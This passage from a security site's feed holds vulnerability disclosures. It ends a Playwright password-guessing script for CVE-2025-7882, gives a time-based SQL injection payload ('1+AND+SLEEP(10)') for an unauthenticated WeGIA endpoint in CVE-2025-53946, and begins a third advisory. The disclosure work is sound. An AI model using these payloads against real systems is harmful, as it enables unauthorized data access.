&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;get_by_text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Avançado&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;exact&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;True&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;click&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;break&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;else&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Nenhuma senha funcionou.&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;context&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;close&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;browser&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;close&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;if&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;==&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;main&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;with&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;sync_playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;as&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;run&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;r&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image.png&amp;#34;
	width=&amp;#34;1878&amp;#34;
	height=&amp;#34;950&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image_hu_91b4360fd68a28ba.png 480w, /p/cve-2025-7882/image_hu_d141f112b09e10d2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;197&amp;#34;
		data-flex-basis=&amp;#34;474px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image-1.png&amp;#34;
	width=&amp;#34;1889&amp;#34;
	height=&amp;#34;1016&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image-1_hu_2f38919172f7d0b7.png 480w, /p/cve-2025-7882/image-1_hu_268f297aff1b93f7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;446px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image-2.png&amp;#34;
	width=&amp;#34;489&amp;#34;
	height=&amp;#34;534&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image-2_hu_e9f740f724ca4e72.png 480w, /p/cve-2025-7882/image-2_hu_44ca76c3433fa5cf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;91&amp;#34;
		data-flex-basis=&amp;#34;219px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image-3.png&amp;#34;
	width=&amp;#34;442&amp;#34;
	height=&amp;#34;542&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image-3_hu_b2613553a6c02900.png 480w, /p/cve-2025-7882/image-3_hu_9d0794b8a52b243e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;81&amp;#34;
		data-flex-basis=&amp;#34;195px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image-4.png&amp;#34;
	width=&amp;#34;1830&amp;#34;
	height=&amp;#34;933&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image-4_hu_89b33ba6038c9b72.png 480w, /p/cve-2025-7882/image-4_hu_9581ddd2580c03c9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;196&amp;#34;
		data-flex-basis=&amp;#34;470px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/_t3ZC8zU4-A&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/_t3ZC8zU4-A&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The lack of session validation in this endpoint can lead to several security risks:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Unauthorized Data Exposure:&amp;lt;/b&amp;gt; Unauthenticated users can enumerate or retrieve sensitive internal data.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Privilege Escalation:&amp;lt;/b&amp;gt; Attackers might access or infer information intended only for authorized users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Information Disclosure:&amp;lt;/b&amp;gt; Business logic and internal IDs (like user roles or permissions) can be leaked.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Reconnaissance Support:&amp;lt;/b&amp;gt; Facilitates attackers in mapping backend structures for more targeted attacks.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7882.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7882.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53946</title>
        <link>https://www.cvehunters.com/p/cve-2025-53946/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53946/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53946-sql-injection-vulnerability-in-id_fichamedica-parameter-on-profile_pacientephp-endpoint&amp;#34;&amp;gt;CVE-2025-53946: SQL Injection Vulnerability in &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53946&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53946&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/saude/profile_paciente.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53946-sql-injection-vulnerability-in-id_fichamedica-parameter-on-profile_pacientephp-endpoint&amp;#34;&amp;gt;CVE-2025-53946: SQL Injection Vulnerability in &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53946&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53946&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/saude/profile_paciente.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/saude/profile_paciente.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  1&#43;AND&#43;SLEEP(10)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;manual-exploration&amp;#34;&amp;gt;Manual Exploration:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53946/image.png&amp;#34;
	width=&amp;#34;1280&amp;#34;
	height=&amp;#34;602&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53946/image_hu_446a5f0aca967603.png 480w, /p/cve-2025-53946/image_hu_88f973a4b4b6d596.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;212&amp;#34;
		data-flex-basis=&amp;#34;510px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53946/image-1.png&amp;#34;
	width=&amp;#34;1280&amp;#34;
	height=&amp;#34;588&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53946/image-1_hu_10a28eb522607c.png 480w, /p/cve-2025-53946/image-1_hu_2b701927703256a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;217&amp;#34;
		data-flex-basis=&amp;#34;522px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sqlmap&amp;#34;&amp;gt;Sqlmap:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53946/image-2.png&amp;#34;
	width=&amp;#34;859&amp;#34;
	height=&amp;#34;660&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53946/image-2_hu_d8d1038b65332cf7.png 480w, /p/cve-2025-53946/image-2_hu_144f09ecde05299.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;130&amp;#34;
		data-flex-basis=&amp;#34;312px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-532r-mgxv-g7jm&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-532r-mgxv-g7jm&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54058</title>
        <link>https://www.cvehunters.com/p/cve-2025-54058/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-54058/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54058-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editarenderecophp-endpoint&amp;#34;&amp;gt;CVE-2025-54058: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;dependente_editarEndereco.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54058&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54058&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/funcionario/dependente_editarEndereco.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54058-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editarenderecophp-endpoint&amp;#34;&amp;gt;CVE-2025-54058: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;dependente_editarEndereco.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54058&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54058&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/funcionario/dependente_editarEndereco.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
